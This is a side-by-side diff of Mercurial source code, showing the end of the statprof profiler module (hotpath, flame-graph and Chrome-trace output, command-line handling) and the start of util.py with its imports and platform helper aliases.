572 source = stat.site.getsource(25)
573 if sys.version_info.major >= 3 and not isinstance(source, bytes):
573 if sys.version_info.major >= 3 and not isinstance(source, bytes):
574 source = pycompat.bytestr(source)
574 source = pycompat.bytestr(source)
575
575
576 stattuple = (stat.selfpercent(), stat.selfseconds(),
576 stattuple = (stat.selfpercent(), stat.selfseconds(),
577 stat.site.lineno, source)
577 stat.site.lineno, source)
578
578
579 fp.write(b'%33.0f%% %6.2f line %d: %s\n' % stattuple)
579 fp.write(b'%33.0f%% %6.2f line %d: %s\n' % stattuple)
580
580
581 def display_about_method(data, fp, function=None, **kwargs):
581 def display_about_method(data, fp, function=None, **kwargs):
582 if function is None:
582 if function is None:
583 raise Exception("Invalid function")
583 raise Exception("Invalid function")
584
584
585 filename = None
585 filename = None
586 if ':' in function:
586 if ':' in function:
587 filename, function = function.split(':')
587 filename, function = function.split(':')
588
588
589 relevant_samples = 0
589 relevant_samples = 0
590 parents = {}
590 parents = {}
591 children = {}
591 children = {}
592
592
593 for sample in data.samples:
593 for sample in data.samples:
594 for i, site in enumerate(sample.stack):
594 for i, site in enumerate(sample.stack):
595 if site.function == function and (not filename
595 if site.function == function and (not filename
596 or site.filename() == filename):
596 or site.filename() == filename):
597 relevant_samples += 1
597 relevant_samples += 1
598 if i != len(sample.stack) - 1:
598 if i != len(sample.stack) - 1:
599 parent = sample.stack[i + 1]
599 parent = sample.stack[i + 1]
600 if parent in parents:
600 if parent in parents:
601 parents[parent] = parents[parent] + 1
601 parents[parent] = parents[parent] + 1
602 else:
602 else:
603 parents[parent] = 1
603 parents[parent] = 1
604
604
605 if site in children:
605 if site in children:
606 children[site] = children[site] + 1
606 children[site] = children[site] + 1
607 else:
607 else:
608 children[site] = 1
608 children[site] = 1
609
609
610 parents = [(parent, count) for parent, count in parents.iteritems()]
610 parents = [(parent, count) for parent, count in parents.iteritems()]
611 parents.sort(reverse=True, key=lambda x: x[1])
611 parents.sort(reverse=True, key=lambda x: x[1])
612 for parent, count in parents:
612 for parent, count in parents:
613 fp.write(b'%6.2f%% %s:%s line %s: %s\n' %
613 fp.write(b'%6.2f%% %s:%s line %s: %s\n' %
614 (count / relevant_samples * 100,
614 (count / relevant_samples * 100,
615 pycompat.fsencode(parent.filename()),
615 pycompat.fsencode(parent.filename()),
616 pycompat.sysbytes(parent.function),
616 pycompat.sysbytes(parent.function),
617 parent.lineno,
617 parent.lineno,
618 pycompat.sysbytes(parent.getsource(50))))
618 pycompat.sysbytes(parent.getsource(50))))
619
619
620 stats = SiteStats.buildstats(data.samples)
620 stats = SiteStats.buildstats(data.samples)
621 stats = [s for s in stats
621 stats = [s for s in stats
622 if s.site.function == function and
622 if s.site.function == function and
623 (not filename or s.site.filename() == filename)]
623 (not filename or s.site.filename() == filename)]
624
624
625 total_cum_sec = 0
625 total_cum_sec = 0
626 total_self_sec = 0
626 total_self_sec = 0
627 total_self_percent = 0
627 total_self_percent = 0
628 total_cum_percent = 0
628 total_cum_percent = 0
629 for stat in stats:
629 for stat in stats:
630 total_cum_sec += stat.totalseconds()
630 total_cum_sec += stat.totalseconds()
631 total_self_sec += stat.selfseconds()
631 total_self_sec += stat.selfseconds()
632 total_self_percent += stat.selfpercent()
632 total_self_percent += stat.selfpercent()
633 total_cum_percent += stat.totalpercent()
633 total_cum_percent += stat.totalpercent()
634
634
635 fp.write(
635 fp.write(
636 b'\n %s:%s Total: %0.2fs (%0.2f%%) Self: %0.2fs (%0.2f%%)\n\n'
636 b'\n %s:%s Total: %0.2fs (%0.2f%%) Self: %0.2fs (%0.2f%%)\n\n'
637 % (
637 % (
638 pycompat.sysbytes(filename or '___'),
638 pycompat.sysbytes(filename or '___'),
639 pycompat.sysbytes(function),
639 pycompat.sysbytes(function),
640 total_cum_sec,
640 total_cum_sec,
641 total_cum_percent,
641 total_cum_percent,
642 total_self_sec,
642 total_self_sec,
643 total_self_percent
643 total_self_percent
644 ))
644 ))
645
645
646 children = [(child, count) for child, count in children.iteritems()]
646 children = [(child, count) for child, count in children.iteritems()]
647 children.sort(reverse=True, key=lambda x: x[1])
647 children.sort(reverse=True, key=lambda x: x[1])
648 for child, count in children:
648 for child, count in children:
649 fp.write(b' %6.2f%% line %s: %s\n' %
649 fp.write(b' %6.2f%% line %s: %s\n' %
650 (count / relevant_samples * 100, child.lineno,
650 (count / relevant_samples * 100, child.lineno,
651 pycompat.sysbytes(child.getsource(50))))
651 pycompat.sysbytes(child.getsource(50))))
652
652
653 def display_hotpath(data, fp, limit=0.05, **kwargs):
653 def display_hotpath(data, fp, limit=0.05, **kwargs):
654 class HotNode(object):
654 class HotNode(object):
655 def __init__(self, site):
655 def __init__(self, site):
656 self.site = site
656 self.site = site
657 self.count = 0
657 self.count = 0
658 self.children = {}
658 self.children = {}
659
659
660 def add(self, stack, time):
660 def add(self, stack, time):
661 self.count += time
661 self.count += time
662 site = stack[0]
662 site = stack[0]
663 child = self.children.get(site)
663 child = self.children.get(site)
664 if not child:
664 if not child:
665 child = HotNode(site)
665 child = HotNode(site)
666 self.children[site] = child
666 self.children[site] = child
667
667
668 if len(stack) > 1:
668 if len(stack) > 1:
669 i = 1
669 i = 1
670 # Skip boiler plate parts of the stack
670 # Skip boiler plate parts of the stack
671 while i < len(stack) and stack[i].skipname() in skips:
671 while i < len(stack) and stack[i].skipname() in skips:
672 i += 1
672 i += 1
673 if i < len(stack):
673 if i < len(stack):
674 child.add(stack[i:], time)
674 child.add(stack[i:], time)
675
675
676 root = HotNode(None)
676 root = HotNode(None)
677 lasttime = data.samples[0].time
677 lasttime = data.samples[0].time
678 for sample in data.samples:
678 for sample in data.samples:
679 root.add(sample.stack[::-1], sample.time - lasttime)
679 root.add(sample.stack[::-1], sample.time - lasttime)
680 lasttime = sample.time
680 lasttime = sample.time
681
681
682 def _write(node, depth, multiple_siblings):
682 def _write(node, depth, multiple_siblings):
683 site = node.site
683 site = node.site
684 visiblechildren = [c for c in node.children.itervalues()
684 visiblechildren = [c for c in node.children.itervalues()
685 if c.count >= (limit * root.count)]
685 if c.count >= (limit * root.count)]
686 if site:
686 if site:
687 indent = depth * 2 - 1
687 indent = depth * 2 - 1
688 filename = ''
688 filename = ''
689 function = ''
689 function = ''
690 if len(node.children) > 0:
690 if len(node.children) > 0:
691 childsite = list(node.children.itervalues())[0].site
691 childsite = list(node.children.itervalues())[0].site
692 filename = (childsite.filename() + ':').ljust(15)
692 filename = (childsite.filename() + ':').ljust(15)
693 function = childsite.function
693 function = childsite.function
694
694
695 # lots of string formatting
695 # lots of string formatting
696 listpattern = ''.ljust(indent) +\
696 listpattern = ''.ljust(indent) +\
697 ('\\' if multiple_siblings else '|') +\
697 ('\\' if multiple_siblings else '|') +\
698 ' %4.1f%% %s %s'
698 ' %4.1f%% %s %s'
699 liststring = listpattern % (node.count / root.count * 100,
699 liststring = listpattern % (node.count / root.count * 100,
700 filename, function)
700 filename, function)
701 codepattern = '%' + ('%d' % (55 - len(liststring))) + 's %d: %s'
701 codepattern = '%' + ('%d' % (55 - len(liststring))) + 's %d: %s'
702 codestring = codepattern % ('line', site.lineno, site.getsource(30))
702 codestring = codepattern % ('line', site.lineno, site.getsource(30))
703
703
704 finalstring = liststring + codestring
704 finalstring = liststring + codestring
705 childrensamples = sum([c.count for c in node.children.itervalues()])
705 childrensamples = sum([c.count for c in node.children.itervalues()])
706 # Make frames that performed more than 10% of the operation red
706 # Make frames that performed more than 10% of the operation red
707 if node.count - childrensamples > (0.1 * root.count):
707 if node.count - childrensamples > (0.1 * root.count):
708 finalstring = '\033[91m' + finalstring + '\033[0m'
708 finalstring = '\033[91m' + finalstring + '\033[0m'
709 # Make frames that didn't actually perform work dark grey
709 # Make frames that didn't actually perform work dark grey
710 elif node.count - childrensamples == 0:
710 elif node.count - childrensamples == 0:
711 finalstring = '\033[90m' + finalstring + '\033[0m'
711 finalstring = '\033[90m' + finalstring + '\033[0m'
712 fp.write(finalstring + b'\n')
712 fp.write(finalstring + b'\n')
713
713
714 newdepth = depth
714 newdepth = depth
715 if len(visiblechildren) > 1 or multiple_siblings:
715 if len(visiblechildren) > 1 or multiple_siblings:
716 newdepth += 1
716 newdepth += 1
717
717
718 visiblechildren.sort(reverse=True, key=lambda x: x.count)
718 visiblechildren.sort(reverse=True, key=lambda x: x.count)
719 for child in visiblechildren:
719 for child in visiblechildren:
720 _write(child, newdepth, len(visiblechildren) > 1)
720 _write(child, newdepth, len(visiblechildren) > 1)
721
721
722 if root.count > 0:
722 if root.count > 0:
723 _write(root, 0, False)
723 _write(root, 0, False)
724
724
725 def write_to_flame(data, fp, scriptpath=None, outputfile=None, **kwargs):
725 def write_to_flame(data, fp, scriptpath=None, outputfile=None, **kwargs):
726 if scriptpath is None:
726 if scriptpath is None:
727 scriptpath = encoding.environ['HOME'] + '/flamegraph.pl'
727 scriptpath = encoding.environ['HOME'] + '/flamegraph.pl'
728 if not os.path.exists(scriptpath):
728 if not os.path.exists(scriptpath):
729 fp.write(b'error: missing %s\n' % scriptpath)
729 fp.write(b'error: missing %s\n' % scriptpath)
730 fp.write(b'get it here: https://github.com/brendangregg/FlameGraph\n')
730 fp.write(b'get it here: https://github.com/brendangregg/FlameGraph\n')
731 return
731 return
732
732
733 fd, path = pycompat.mkstemp()
733 fd, path = pycompat.mkstemp()
734
734
735 file = open(path, "w+")
735 file = open(path, "w+")
736
736
737 lines = {}
737 lines = {}
738 for sample in data.samples:
738 for sample in data.samples:
739 sites = [s.function for s in sample.stack]
739 sites = [s.function for s in sample.stack]
740 sites.reverse()
740 sites.reverse()
741 line = ';'.join(sites)
741 line = ';'.join(sites)
742 if line in lines:
742 if line in lines:
743 lines[line] = lines[line] + 1
743 lines[line] = lines[line] + 1
744 else:
744 else:
745 lines[line] = 1
745 lines[line] = 1
746
746
747 for line, count in lines.iteritems():
747 for line, count in lines.iteritems():
748 file.write("%s %d\n" % (line, count))
748 file.write("%s %d\n" % (line, count))
749
749
750 file.close()
750 file.close()
751
751
752 if outputfile is None:
752 if outputfile is None:
753 outputfile = '~/flamegraph.svg'
753 outputfile = '~/flamegraph.svg'
754
754
755 os.system("perl ~/flamegraph.pl %s > %s" % (path, outputfile))
755 os.system("perl ~/flamegraph.pl %s > %s" % (path, outputfile))
756 fp.write(b'Written to %s\n' % outputfile)
756 fp.write(b'Written to %s\n' % outputfile)
757
757
758 _pathcache = {}
758 _pathcache = {}
759 def simplifypath(path):
759 def simplifypath(path):
760 '''Attempt to make the path to a Python module easier to read by
760 '''Attempt to make the path to a Python module easier to read by
761 removing whatever part of the Python search path it was found
761 removing whatever part of the Python search path it was found
762 on.'''
762 on.'''
763
763
764 if path in _pathcache:
764 if path in _pathcache:
765 return _pathcache[path]
765 return _pathcache[path]
766 hgpath = pycompat.fsencode(encoding.__file__).rsplit(os.sep, 2)[0]
766 hgpath = pycompat.fsencode(encoding.__file__).rsplit(os.sep, 2)[0]
767 for p in [hgpath] + sys.path:
767 for p in [hgpath] + sys.path:
768 prefix = p + os.sep
768 prefix = p + os.sep
769 if path.startswith(prefix):
769 if path.startswith(prefix):
770 path = path[len(prefix):]
770 path = path[len(prefix):]
771 break
771 break
772 _pathcache[path] = path
772 _pathcache[path] = path
773 return path
773 return path
774
774
775 def write_to_json(data, fp):
775 def write_to_json(data, fp):
776 samples = []
776 samples = []
777
777
778 for sample in data.samples:
778 for sample in data.samples:
779 stack = []
779 stack = []
780
780
781 for frame in sample.stack:
781 for frame in sample.stack:
782 stack.append(
782 stack.append(
783 (pycompat.sysstr(frame.path),
783 (pycompat.sysstr(frame.path),
784 frame.lineno,
784 frame.lineno,
785 pycompat.sysstr(frame.function)))
785 pycompat.sysstr(frame.function)))
786
786
787 samples.append((sample.time, stack))
787 samples.append((sample.time, stack))
788
788
789 data = json.dumps(samples)
789 data = json.dumps(samples)
790 if not isinstance(data, bytes):
790 if not isinstance(data, bytes):
791 data = data.encode('utf-8')
791 data = data.encode('utf-8')
792
792
793 fp.write(data)
793 fp.write(data)
794
794
795 def write_to_chrome(data, fp, minthreshold=0.005, maxthreshold=0.999):
795 def write_to_chrome(data, fp, minthreshold=0.005, maxthreshold=0.999):
796 samples = []
796 samples = []
797 laststack = collections.deque()
797 laststack = collections.deque()
798 lastseen = collections.deque()
798 lastseen = collections.deque()
799
799
800 # The Chrome tracing format allows us to use a compact stack
800 # The Chrome tracing format allows us to use a compact stack
801 # representation to save space. It's fiddly but worth it.
801 # representation to save space. It's fiddly but worth it.
802 # We maintain a bijection between stack and ID.
802 # We maintain a bijection between stack and ID.
803 stack2id = {}
803 stack2id = {}
804 id2stack = [] # will eventually be rendered
804 id2stack = [] # will eventually be rendered
805
805
806 def stackid(stack):
806 def stackid(stack):
807 if not stack:
807 if not stack:
808 return
808 return
809 if stack in stack2id:
809 if stack in stack2id:
810 return stack2id[stack]
810 return stack2id[stack]
811 parent = stackid(stack[1:])
811 parent = stackid(stack[1:])
812 myid = len(stack2id)
812 myid = len(stack2id)
813 stack2id[stack] = myid
813 stack2id[stack] = myid
814 id2stack.append(dict(category=stack[0][0], name='%s %s' % stack[0]))
814 id2stack.append(dict(category=stack[0][0], name='%s %s' % stack[0]))
815 if parent is not None:
815 if parent is not None:
816 id2stack[-1].update(parent=parent)
816 id2stack[-1].update(parent=parent)
817 return myid
817 return myid
818
818
819 # The sampling profiler can sample multiple times without
819 # The sampling profiler can sample multiple times without
820 # advancing the clock, potentially causing the Chrome trace viewer
820 # advancing the clock, potentially causing the Chrome trace viewer
821 # to render single-pixel columns that we cannot zoom in on. We
821 # to render single-pixel columns that we cannot zoom in on. We
822 # work around this by pretending that zero-duration samples are a
822 # work around this by pretending that zero-duration samples are a
823 # millisecond in length.
823 # millisecond in length.
824
824
825 clamp = 0.001
825 clamp = 0.001
826
826
827 # We provide knobs that by default attempt to filter out stack
827 # We provide knobs that by default attempt to filter out stack
828 # frames that are too noisy:
828 # frames that are too noisy:
829 #
829 #
830 # * A few take almost all execution time. These are usually boring
830 # * A few take almost all execution time. These are usually boring
831 # setup functions, giving a stack that is deep but uninformative.
831 # setup functions, giving a stack that is deep but uninformative.
832 #
832 #
833 # * Numerous samples take almost no time, but introduce lots of
833 # * Numerous samples take almost no time, but introduce lots of
834 # noisy, oft-deep "spines" into a rendered profile.
834 # noisy, oft-deep "spines" into a rendered profile.
835
835
836 blacklist = set()
836 blacklist = set()
837 totaltime = data.samples[-1].time - data.samples[0].time
837 totaltime = data.samples[-1].time - data.samples[0].time
838 minthreshold = totaltime * minthreshold
838 minthreshold = totaltime * minthreshold
839 maxthreshold = max(totaltime * maxthreshold, clamp)
839 maxthreshold = max(totaltime * maxthreshold, clamp)
840
840
841 def poplast():
841 def poplast():
842 oldsid = stackid(tuple(laststack))
842 oldsid = stackid(tuple(laststack))
843 oldcat, oldfunc = laststack.popleft()
843 oldcat, oldfunc = laststack.popleft()
844 oldtime, oldidx = lastseen.popleft()
844 oldtime, oldidx = lastseen.popleft()
845 duration = sample.time - oldtime
845 duration = sample.time - oldtime
846 if minthreshold <= duration <= maxthreshold:
846 if minthreshold <= duration <= maxthreshold:
847 # ensure no zero-duration events
847 # ensure no zero-duration events
848 sampletime = max(oldtime + clamp, sample.time)
848 sampletime = max(oldtime + clamp, sample.time)
849 samples.append(dict(ph='E', name=oldfunc, cat=oldcat, sf=oldsid,
849 samples.append(dict(ph='E', name=oldfunc, cat=oldcat, sf=oldsid,
850 ts=sampletime*1e6, pid=0))
850 ts=sampletime*1e6, pid=0))
851 else:
851 else:
852 blacklist.add(oldidx)
852 blacklist.add(oldidx)
853
853
854 # Much fiddling to synthesize correctly(ish) nested begin/end
854 # Much fiddling to synthesize correctly(ish) nested begin/end
855 # events given only stack snapshots.
855 # events given only stack snapshots.
856
856
857 for sample in data.samples:
857 for sample in data.samples:
858 stack = tuple((('%s:%d' % (simplifypath(frame.path), frame.lineno),
858 stack = tuple((('%s:%d' % (simplifypath(frame.path), frame.lineno),
859 frame.function) for frame in sample.stack))
859 frame.function) for frame in sample.stack))
860 qstack = collections.deque(stack)
860 qstack = collections.deque(stack)
861 if laststack == qstack:
861 if laststack == qstack:
862 continue
862 continue
863 while laststack and qstack and laststack[-1] == qstack[-1]:
863 while laststack and qstack and laststack[-1] == qstack[-1]:
864 laststack.pop()
864 laststack.pop()
865 qstack.pop()
865 qstack.pop()
866 while laststack:
866 while laststack:
867 poplast()
867 poplast()
868 for f in reversed(qstack):
868 for f in reversed(qstack):
869 lastseen.appendleft((sample.time, len(samples)))
869 lastseen.appendleft((sample.time, len(samples)))
870 laststack.appendleft(f)
870 laststack.appendleft(f)
871 path, name = f
871 path, name = f
872 sid = stackid(tuple(laststack))
872 sid = stackid(tuple(laststack))
873 samples.append(dict(ph='B', name=name, cat=path, ts=sample.time*1e6,
873 samples.append(dict(ph='B', name=name, cat=path, ts=sample.time*1e6,
874 sf=sid, pid=0))
874 sf=sid, pid=0))
875 laststack = collections.deque(stack)
875 laststack = collections.deque(stack)
876 while laststack:
876 while laststack:
877 poplast()
877 poplast()
878 events = [s[1] for s in enumerate(samples) if s[0] not in blacklist]
878 events = [s[1] for s in enumerate(samples) if s[0] not in blacklist]
879 frames = collections.OrderedDict((str(k), v)
879 frames = collections.OrderedDict((str(k), v)
880 for (k,v) in enumerate(id2stack))
880 for (k,v) in enumerate(id2stack))
881 json.dump(dict(traceEvents=events, stackFrames=frames), fp, indent=1)
881 json.dump(dict(traceEvents=events, stackFrames=frames), fp, indent=1)
882 fp.write('\n')
882 fp.write('\n')
883
883
884 def printusage():
884 def printusage():
885 print(r"""
885 print(r"""
886 The statprof command line allows you to inspect the last profile's results in
886 The statprof command line allows you to inspect the last profile's results in
887 the following forms:
887 the following forms:
888
888
889 usage:
889 usage:
890 hotpath [-l --limit percent]
890 hotpath [-l --limit percent]
891 Shows a graph of calls with the percent of time each takes.
891 Shows a graph of calls with the percent of time each takes.
892 Red calls take over 10%% of the total time themselves.
892 Red calls take over 10%% of the total time themselves.
893 lines
893 lines
894 Shows the actual sampled lines.
894 Shows the actual sampled lines.
895 functions
895 functions
896 Shows the samples grouped by function.
896 Shows the samples grouped by function.
897 function [filename:]functionname
897 function [filename:]functionname
898 Shows the callers and callees of a particular function.
898 Shows the callers and callees of a particular function.
899 flame [-s --script-path] [-o --output-file path]
899 flame [-s --script-path] [-o --output-file path]
900 Writes out a flamegraph to output-file (defaults to ~/flamegraph.svg)
900 Writes out a flamegraph to output-file (defaults to ~/flamegraph.svg)
901 Requires that ~/flamegraph.pl exist.
901 Requires that ~/flamegraph.pl exist.
902 (Specify alternate script path with --script-path.)""")
902 (Specify alternate script path with --script-path.)""")
903
903
904 def main(argv=None):
904 def main(argv=None):
905 if argv is None:
905 if argv is None:
906 argv = sys.argv
906 argv = sys.argv
907
907
908 if len(argv) == 1:
908 if len(argv) == 1:
909 printusage()
909 printusage()
910 return 0
910 return 0
911
911
912 displayargs = {}
912 displayargs = {}
913
913
914 optstart = 2
914 optstart = 2
915 displayargs['function'] = None
915 displayargs['function'] = None
916 if argv[1] == r'hotpath':
916 if argv[1] == r'hotpath':
917 displayargs['format'] = DisplayFormats.Hotpath
917 displayargs['format'] = DisplayFormats.Hotpath
918 elif argv[1] == r'lines':
918 elif argv[1] == r'lines':
919 displayargs['format'] = DisplayFormats.ByLine
919 displayargs['format'] = DisplayFormats.ByLine
920 elif argv[1] == r'functions':
920 elif argv[1] == r'functions':
921 displayargs['format'] = DisplayFormats.ByMethod
921 displayargs['format'] = DisplayFormats.ByMethod
922 elif argv[1] == r'function':
922 elif argv[1] == r'function':
923 displayargs['format'] = DisplayFormats.AboutMethod
923 displayargs['format'] = DisplayFormats.AboutMethod
924 displayargs['function'] = argv[2]
924 displayargs['function'] = argv[2]
925 optstart = 3
925 optstart = 3
926 elif argv[1] == r'flame':
926 elif argv[1] == r'flame':
927 displayargs['format'] = DisplayFormats.FlameGraph
927 displayargs['format'] = DisplayFormats.FlameGraph
928 else:
928 else:
929 printusage()
929 printusage()
930 return 0
930 return 0
931
931
932 # process options
932 # process options
933 try:
933 try:
934 opts, args = pycompat.getoptb(sys.argv[optstart:], "hl:f:o:p:",
934 opts, args = pycompat.getoptb(sys.argv[optstart:], "hl:f:o:p:",
935 ["help", "limit=", "file=", "output-file=", "script-path="])
935 ["help", "limit=", "file=", "output-file=", "script-path="])
936 except getopt.error as msg:
936 except getopt.error as msg:
937 print(msg)
937 print(msg)
938 printusage()
938 printusage()
939 return 2
939 return 2
940
940
941 displayargs['limit'] = 0.05
941 displayargs['limit'] = 0.05
942 path = None
942 path = None
943 for o, value in opts:
943 for o, value in opts:
944 if o in (r"-l", r"--limit"):
944 if o in (r"-l", r"--limit"):
945 displayargs['limit'] = float(value)
945 displayargs['limit'] = float(value)
946 elif o in (r"-f", r"--file"):
946 elif o in (r"-f", r"--file"):
947 path = value
947 path = value
948 elif o in (r"-o", r"--output-file"):
948 elif o in (r"-o", r"--output-file"):
949 displayargs['outputfile'] = value
949 displayargs['outputfile'] = value
950 elif o in (r"-p", r"--script-path"):
950 elif o in (r"-p", r"--script-path"):
951 displayargs['scriptpath'] = value
951 displayargs['scriptpath'] = value
952 elif o in (r"-h", r"help"):
952 elif o in (r"-h", r"help"):
953 printusage()
953 printusage()
954 return 0
954 return 0
955 else:
955 else:
956 assert False, "unhandled option %s" % o
956 assert False, "unhandled option %s" % o
957
957
958 if not path:
958 if not path:
959 print(r'must specify --file to load')
959 print(r'must specify --file to load')
960 return 1
960 return 1
961
961
962 load_data(path=path)
962 load_data(path=path)
963
963
964 display(**pycompat.strkwargs(displayargs))
964 display(**pycompat.strkwargs(displayargs))
965
965
966 return 0
966 return 0
967
967
968 if __name__ == r"__main__":
968 if __name__ == r"__main__":
969 sys.exit(main())
969 sys.exit(main())
@@ -1,4021 +1,4021 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import collections
20 import collections
21 import contextlib
21 import contextlib
22 import errno
22 import errno
23 import gc
23 import gc
24 import hashlib
24 import hashlib
25 import itertools
25 import itertools
26 import mmap
26 import mmap
27 import os
27 import os
28 import platform as pyplatform
28 import platform as pyplatform
29 import re as remod
29 import re as remod
30 import shutil
30 import shutil
31 import socket
31 import socket
32 import stat
32 import stat
33 import sys
33 import sys
34 import time
34 import time
35 import traceback
35 import traceback
36 import warnings
36 import warnings
37 import zlib
37 import zlib
38
38
39 from .thirdparty import (
39 from .thirdparty import (
40 attr,
40 attr,
41 )
41 )
42 from hgdemandimport import tracing
42 from hgdemandimport import tracing
43 from . import (
43 from . import (
44 encoding,
44 encoding,
45 error,
45 error,
46 i18n,
46 i18n,
47 node as nodemod,
47 node as nodemod,
48 policy,
48 policy,
49 pycompat,
49 pycompat,
50 urllibcompat,
50 urllibcompat,
51 )
51 )
52 from .utils import (
52 from .utils import (
53 procutil,
53 procutil,
54 stringutil,
54 stringutil,
55 )
55 )
56
56
57 base85 = policy.importmod(r'base85')
57 base85 = policy.importmod(r'base85')
58 osutil = policy.importmod(r'osutil')
58 osutil = policy.importmod(r'osutil')
59 parsers = policy.importmod(r'parsers')
59 parsers = policy.importmod(r'parsers')
60
60
61 b85decode = base85.b85decode
61 b85decode = base85.b85decode
62 b85encode = base85.b85encode
62 b85encode = base85.b85encode
63
63
64 cookielib = pycompat.cookielib
64 cookielib = pycompat.cookielib
65 httplib = pycompat.httplib
65 httplib = pycompat.httplib
66 pickle = pycompat.pickle
66 pickle = pycompat.pickle
67 safehasattr = pycompat.safehasattr
67 safehasattr = pycompat.safehasattr
68 socketserver = pycompat.socketserver
68 socketserver = pycompat.socketserver
69 bytesio = pycompat.bytesio
69 bytesio = pycompat.bytesio
70 # TODO deprecate stringio name, as it is a lie on Python 3.
70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 stringio = bytesio
71 stringio = bytesio
72 xmlrpclib = pycompat.xmlrpclib
72 xmlrpclib = pycompat.xmlrpclib
73
73
74 httpserver = urllibcompat.httpserver
74 httpserver = urllibcompat.httpserver
75 urlerr = urllibcompat.urlerr
75 urlerr = urllibcompat.urlerr
76 urlreq = urllibcompat.urlreq
76 urlreq = urllibcompat.urlreq
77
77
78 # workaround for win32mbcs
78 # workaround for win32mbcs
79 _filenamebytestr = pycompat.bytestr
79 _filenamebytestr = pycompat.bytestr
80
80
81 if pycompat.iswindows:
81 if pycompat.iswindows:
82 from . import windows as platform
82 from . import windows as platform
83 else:
83 else:
84 from . import posix as platform
84 from . import posix as platform
85
85
86 _ = i18n._
86 _ = i18n._
87
87
88 bindunixsocket = platform.bindunixsocket
88 bindunixsocket = platform.bindunixsocket
89 cachestat = platform.cachestat
89 cachestat = platform.cachestat
90 checkexec = platform.checkexec
90 checkexec = platform.checkexec
91 checklink = platform.checklink
91 checklink = platform.checklink
92 copymode = platform.copymode
92 copymode = platform.copymode
93 expandglobs = platform.expandglobs
93 expandglobs = platform.expandglobs
94 getfsmountpoint = platform.getfsmountpoint
94 getfsmountpoint = platform.getfsmountpoint
95 getfstype = platform.getfstype
95 getfstype = platform.getfstype
96 groupmembers = platform.groupmembers
96 groupmembers = platform.groupmembers
97 groupname = platform.groupname
97 groupname = platform.groupname
98 isexec = platform.isexec
98 isexec = platform.isexec
99 isowner = platform.isowner
99 isowner = platform.isowner
100 listdir = osutil.listdir
100 listdir = osutil.listdir
101 localpath = platform.localpath
101 localpath = platform.localpath
102 lookupreg = platform.lookupreg
102 lookupreg = platform.lookupreg
103 makedir = platform.makedir
103 makedir = platform.makedir
104 nlinks = platform.nlinks
104 nlinks = platform.nlinks
105 normpath = platform.normpath
105 normpath = platform.normpath
106 normcase = platform.normcase
106 normcase = platform.normcase
107 normcasespec = platform.normcasespec
107 normcasespec = platform.normcasespec
108 normcasefallback = platform.normcasefallback
108 normcasefallback = platform.normcasefallback
109 openhardlinks = platform.openhardlinks
109 openhardlinks = platform.openhardlinks
110 oslink = platform.oslink
110 oslink = platform.oslink
111 parsepatchoutput = platform.parsepatchoutput
111 parsepatchoutput = platform.parsepatchoutput
112 pconvert = platform.pconvert
112 pconvert = platform.pconvert
113 poll = platform.poll
113 poll = platform.poll
114 posixfile = platform.posixfile
114 posixfile = platform.posixfile
115 readlink = platform.readlink
115 readlink = platform.readlink
116 rename = platform.rename
116 rename = platform.rename
117 removedirs = platform.removedirs
117 removedirs = platform.removedirs
118 samedevice = platform.samedevice
118 samedevice = platform.samedevice
119 samefile = platform.samefile
119 samefile = platform.samefile
120 samestat = platform.samestat
120 samestat = platform.samestat
121 setflags = platform.setflags
121 setflags = platform.setflags
122 split = platform.split
122 split = platform.split
123 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
124 statisexec = platform.statisexec
124 statisexec = platform.statisexec
125 statislink = platform.statislink
125 statislink = platform.statislink
126 umask = platform.umask
126 umask = platform.umask
127 unlink = platform.unlink
127 unlink = platform.unlink
128 username = platform.username
128 username = platform.username
129
129
130 try:
130 try:
131 recvfds = osutil.recvfds
131 recvfds = osutil.recvfds
132 except AttributeError:
132 except AttributeError:
133 pass
133 pass
134
134
135 # Python compatibility
135 # Python compatibility
136
136
137 _notset = object()
137 _notset = object()
138
138
139 def bitsfrom(container):
139 def bitsfrom(container):
140 bits = 0
140 bits = 0
141 for bit in container:
141 for bit in container:
142 bits |= bit
142 bits |= bit
143 return bits
143 return bits
144
144
145 # python 2.6 still have deprecation warning enabled by default. We do not want
145 # python 2.6 still have deprecation warning enabled by default. We do not want
146 # to display anything to standard user so detect if we are running test and
146 # to display anything to standard user so detect if we are running test and
147 # only use python deprecation warning in this case.
147 # only use python deprecation warning in this case.
148 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
148 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
149 if _dowarn:
149 if _dowarn:
150 # explicitly unfilter our warning for python 2.7
150 # explicitly unfilter our warning for python 2.7
151 #
151 #
152 # The option of setting PYTHONWARNINGS in the test runner was investigated.
152 # The option of setting PYTHONWARNINGS in the test runner was investigated.
153 # However, module name set through PYTHONWARNINGS was exactly matched, so
153 # However, module name set through PYTHONWARNINGS was exactly matched, so
154 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
154 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
155 # makes the whole PYTHONWARNINGS thing useless for our usecase.
155 # makes the whole PYTHONWARNINGS thing useless for our usecase.
156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
